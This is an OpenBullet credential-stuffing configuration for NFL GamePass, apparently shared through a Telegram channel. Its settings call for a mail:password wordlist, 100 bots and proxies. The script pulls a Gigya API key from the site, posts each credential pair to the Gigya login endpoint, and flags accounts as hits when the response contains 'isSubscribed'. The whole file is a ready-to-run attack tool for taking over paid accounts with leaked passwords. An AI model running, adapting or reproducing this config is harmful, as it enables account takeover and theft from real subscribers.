[SETTINGS]
{
  "Name": "NFL GamePass",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-14T12:16:45.7284132-04:00",
  "AdditionalInfo": "Telegram Channel: @OpenBulletChannel",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#G REQUEST GET "https://www.nflgamepass.com/api/en/content/web/config/v1/config" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#APIK PARSE "<SOURCE>" LR "\":{\"JAVASCRIPT_API_URL\":\"https://cdns.eu1.gigya.com/js/gigya.js?apiKey=" "\"," -> VAR "APIK" 

#P REQUEST POST "https://accounts.us1.gigya.com/accounts.login" 
  CONTENT "loginID=<USER>&password=<PASS>&sessionExpiration=0&targetEnv=jssdk&include=profile%2Cdata%2Cemails%2Csubscriptions%2Cpreferences%2C&includeUserInfo=true&loginMode=standard&lang=en&APIKey=<APIK>&source=showScreenSet&sdk=js_latest&authMode=cookie&pageURL=https%3A%2F%2Fwww.nflgamepass.com%2F&format=json" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: accounts.us1.gigya.com" 
  HEADER "Origin: https://cdns.us1.gigya.com" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://cdns.us1.gigya.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid loginID or password" 
  KEYCHAIN Success OR 
    KEY "isSubscribed" 

